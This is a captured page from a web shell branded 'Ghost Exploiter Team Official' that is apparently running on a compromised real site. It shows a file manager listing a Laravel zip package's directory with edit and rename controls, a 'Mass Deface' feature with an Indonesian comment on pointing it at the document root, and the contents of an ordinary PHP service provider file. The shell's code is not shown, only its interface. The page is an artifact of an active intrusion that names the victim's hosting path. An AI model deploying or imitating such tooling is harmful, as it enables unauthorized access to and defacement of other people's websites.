webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
portal.aminikamanpower.com
/
vendor
/
zanysoft
/
laravel-zip
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Zip.php
15.505KB
edt
ren
ZipFacade.php
0.188KB
edt
ren
ZipManager.php
7.629KB
edt
ren
ZipServiceProvider.php
1.124KB
edt
ren
<?php namespace ZanySoft\Zip; use Illuminate\Support\ServiceProvider; class ZipServiceProvider extends ServiceProvider { /** * Register the service provider. * * @return void */ public function register() { $this->registerCpanelService(); /*if ($this->app->runningInConsole()) { $this->registerResources(); }*/ } /** * Register currency provider. * * @return void */ public function registerCpanelService() { $this->app->singleton('zip', function ($app) { return new Zip($app); }); } /** * Register currency resources. * * @return void */ public function registerResources() { if ($this->isLumen() === false) { $this->publishes([ __DIR__ . '/../config/zip.php' => config_path('zip.php'), ], 'config'); } } /** * Check if package is running under Lumen app * * @return bool */ protected function isLumen() { return str_contains($this->app->version(), 'Lumen') === true; } }
<=Back
Liking